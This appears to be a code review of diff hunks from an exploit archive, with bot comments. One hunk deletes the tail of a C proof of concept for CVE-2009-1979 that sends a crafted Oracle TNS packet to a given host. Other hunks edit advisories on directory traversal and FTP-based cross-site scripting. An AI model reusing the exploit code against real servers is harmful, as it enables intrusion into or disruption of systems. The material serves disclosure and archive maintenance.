"\x2E\x2C\x27\x20\x4E\x4C\x53\x5F\x43\x41\x4C\x45\x4E\x44\x41\x52"
|
||||
"\x3D\x20\x27\x47\x52\x45\x47\x4F\x52\x49\x41\x4E\x27\x20\x4E\x4C"
|
||||
"\x53\x5F\x44\x41\x54\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27"
|
||||
"\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x27\x20\x4E\x4C\x53\x5F\x44"
|
||||
"\x41\x54\x45\x5F\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x20\x27\x41"
|
||||
"\x4D\x45\x52\x49\x43\x41\x4E\x27\x20\x4E\x4C\x53\x5F\x53\x4F\x52"
|
||||
"\x54\x3D\x20\x27\x42\x49\x4E\x41\x52\x59\x27\x20\x54\x49\x4D\x45"
|
||||
"\x5F\x5A\x4F\x4E\xEA\x45\x3D\x20\x27\x2B\x30\x33\x3A\x30\x30\x27"
|
||||
"\x20\x4E\x4C\x53\x5F\x43\x4F\x4D\x50\x3D\x20\x27\x42\x49\x4E\x41"
|
||||
"\x52\x59\x27\x20\x4E\x4C\x53\x5F\x44\x55\x41\x4C\x5F\x43\x55\x52"
|
||||
"\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x54"
|
||||
"\x49\x4D\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27\x48\x48\x2E"
|
||||
"\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C\x53"
|
||||
"\x5F\x54\x49\x4D\x45\x53\x54\x41\x4D\x50\x5F\x46\x4F\x52\x4D\x41"
|
||||
"\x54\x3D\x20\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48"
|
||||
"\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C"
|
||||
"\x53\x5F\x54\x49\x4D\x45\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54"
|
||||
"\x3D\x20\x27\x48\x48\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41"
|
||||
"\x4D\x20\x54\x5A\x52\x27\x20\x4E\x4C\x53\x5F\x54\x49\x4D\x45\x53"
|
||||
"\x54\x41\x4D\x50\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20"
|
||||
"\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48\x2E\x4D\x49"
|
||||
"\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x20\x54\x5A\x52\x27\x00\x00"
|
||||
"\x00\x00\x00\x00\x17\x00\x00\x00\x17\x41\x55\x54\x48\x5F\x4C\x4F"
|
||||
"\x47\x49\x43\x41\x4C\x5F\x53\x45\x53\x53\x49\x4F\x4E\x5F\x49\x44"
|
||||
"\x20\x00\x00\x00\x20\x35\x44\x46\x34\x37\x43\x45\x35\x42\x38\x42"
|
||||
"\x32\x34\x43\x46\x38\x42\x46\x42\x36\x46\x30\x46\x36\x39\x32\x42"
|
||||
"\x38\x46\x42\x39\x38\x00\x00\x00\x00\x10\x00\x00\x00\x10\x41\x55"
|
||||
"\x54\x48\x5F\x46\x41\x49\x4C\x4F\x56\x45\x52\x5F\x49\x44\x00\x00"
|
||||
"\x00\x00\x00\x00\x00\x00"
|
||||
,1318);
|
||||
|
||||
pkt1318[0x41]=0x80;
|
||||
|
||||
s_send (s, pkt1318, 1318);
|
||||
|
||||
assert (closesocket (s)==0);
|
||||
return true;
|
||||
}
|
||||
else
|
||||
{
|
||||
printf ("while connect(): select() returns zero\n");
|
||||
assert (closesocket (s)==0);
|
||||
return false;
|
||||
};
|
||||
};
|
||||
|
||||
void main(int argc, char * argv[])
|
||||
{
|
||||
|
||||
printf ("CVE-2009-1979 PoC. Working at least on 10.2.0.4 win32\n");
|
||||
printf ("Vulnerability discovered by Dennis Yurichev <dennis@conus.info> http://blogs.conus.info\n");
|
||||
if (argv[1]==NULL)
|
||||
{
|
||||
printf ("use: %s <hostname>\n", argv[0]);
|
||||
return;
|
||||
};
|
||||
|
||||
try_host (argv[1]);
|
||||
};
|
|
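Review bot: this hunk drops the whole CVE-2009-1979 PoC (386 lines, no replacement) with no rationale in the commit message; add a note on why (moved, superseded, duplicate). Independently of the removal, the deleted code carried several defects a reader of the history should know about: `NSPTCN`, `NSPTDA` and `s_send_NSPTDA` are defined but never used by `try_host`; `s_send_TNS_command` calls `strlen(cmd)` twice and hits `assert (0)` for any command of 231 bytes or more; `connect()` is issued on a socket already switched to non-blocking mode by `ioctlsocket(s, FIONBIO, &on)` and its result `r` is never inspected; `WSAStartup` is never paired with `WSACleanup`; and `void main` is not a standard signature. Note also that the connect strings hard-code `HOST=192.168.0.115`, `USER=dennis` and `SERVICE_NAME=orcl`, so the PoC as written only ever addressed the author's own lab instance.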
@ -1,7 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/1839/info
|
||||
|
||||
|
||||
Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS) and Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability:
|
||||
Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS). This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability:
|
||||
|
||||
- The Agent services server on port 8100/tcp
|
||||
- The End Entity services server on port 443/tcp (Accessible through SSL)
|
||||
|
|
|
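Review bot: the rewritten sentence still reads 'in both iPlanet Certificate Management System (CMS)' after Netscape Directory Server was removed from it, so 'both' is now dangling; change it to 'in iPlanet Certificate Management System (CMS)'. Since the two resulting files cite the same `source:` line (bid/1839), consider adding a sentence to each saying it is the CMS or the Directory Server half of that advisory, so a reader landing on one file knows the other exists.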
@ -1,7 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/1839/info
|
||||
|
||||
|
||||
Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS) and Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability:
|
||||
Acquiring access to known files outside of the web root is possible through directory traversal techniques in Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability:
|
||||
|
||||
- The Agent services server on port 8100/tcp
|
||||
- The End Entity services server on port 443/tcp (Accessible through SSL)
|
||||
|
|
|
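Review bot: the two service lines ('The Agent services server on port 8100/tcp' and 'The End Entity services server on port 443/tcp') were carried over unchanged from the combined entry into this Directory Server-only file; confirm they describe Netscape Directory Server rather than the CMS half of the original text, and drop or adjust them if they do not. As in the sibling hunk, the `source:` line is identical for both split files, so a cross-reference between the two would keep them from drifting apart silently.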
@ -1,6 +1,6 @@
|
|||
source: http://www.securityfocus.com/bid/31855/info
|
||||
|
||||
Multiple vendors' web browsers are prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
|
||||
Mozilla Firefox 3 is prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
|
||||
|
||||
Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible.
|
||||
|
||||
|
|
|
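Review bot: the new line pins the product to 'Mozilla Firefox 3' but names no fixed release, and the second paragraph is unchanged generic BID text; since the point of splitting the multi-vendor entry per product is to make each file product-specific, add the affected and fixed Firefox versions if known (or state that none is recorded) so the file carries information the original 'Multiple vendors' line did not.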
@ -1,6 +1,6 @@
|
|||
source: http://www.securityfocus.com/bid/31855/info
|
||||
|
||||
Multiple vendors' web browsers are prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
|
||||
Google Chrome 0.2.149 is prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
|
||||
|
||||
Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible.
|
||||
|
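Review bot: same issue as the Firefox split: 'Google Chrome 0.2.149' names a single build, but everything after that sentence is identical to the Firefox file and both cite the same `source:` (bid/31855); note the fixed Chrome version if known and add a cross-reference between the two files so later edits to one are not lost on the other.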